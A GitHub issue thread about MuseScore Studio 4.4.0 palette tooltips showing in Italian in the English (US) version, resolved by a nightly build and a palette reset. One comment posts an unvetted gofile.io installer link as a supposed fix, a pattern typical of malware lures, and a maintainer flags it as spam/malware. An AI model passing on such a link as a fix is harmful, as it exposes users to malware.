### ISSUE TITLE
Some palette in the English (US) version of MS display tooltip in Italian

### ISSUE THREAD

**Issue by FrancRos31** [musescore/MuseScore#24447]
### Issue type

UX/Interaction bug (incorrect behaviour)

### Description with steps to reproduce

1. Open empty Musescore (English US version)
2. Open Layout, Grace notes and Beam properties palettes
3. Check tooltip
Expected behaviour: All the tooltip are in English (US)
Actual behaviour: The majority of the tooltips is in Italian

### Supporting files, videos and screenshots

https://github.com/user-attachments/assets/9a38462f-5feb-4a59-9ded-09667e5cccdf

### What is the latest version of MuseScore Studio where this issue is present?

OS: Windows 10 Version 2009 or later, Arch.: x86_64, MuseScore Studio version (64-bit): 4.4.0-242390800, revision: github-musescore-musescore-0fcd11b

### Regression

I was unable to check

### Operating system

Windows 10 Pro

### Checklist

- [X] This report follows the [guidelines](https://github.com/musescore/MuseScore/wiki/Reporting-bugs-and-issues) for reporting bugs and issues
- [X] I have verified that this issue has not been logged before, by searching the [issue tracker](https://github.com/musescore/MuseScore/issues) for similar issues
- [X] I have attached all requested files and information to this report
- [X] I have attempted to identify the root problem as concisely as possible, and have used minimal reproducible examples where possible

**Comment by santos-naudiyal** [comment]
try this
https://gofile.io/d/yMHabA
select the desired compiler in the installer

**Comment by Jojo-Schmitz** [comment]
> try this https://gofile.io/d/yMHabA select the desired compiler in the installer

Spam/malware again!

**Comment by Jojo-Schmitz** [comment]
Also see #22960

**Comment by cbjeukendrup** [comment]
This should indeed be fixed in 4.4.1. When you use the latest 4.4.1 nightly build (https://musescore.org/en/nightly-builds) and then reset the palette, switching languages should work as expected again.

**Comment by FrancRos31** [comment]
Resetting the palettes solved the problem, thanks for the suggestion.
I made some tests in various languages to make sure it was not a general problem: I changed languages five times (English US, French, Spanish, Esperanto, Italian) and I noticed that on the Beam porperties palette there was an overlapping of the tooltip languages (for example, opening the palette in the English version after coming from Esperanto version left some element's name in Esperanto translation and the same from other languages). Now, I can't open the issue because after resetting the palette the problem disappeared from all the different language versions, but I wanted to make you aware in case (hopefully not) it reappears.
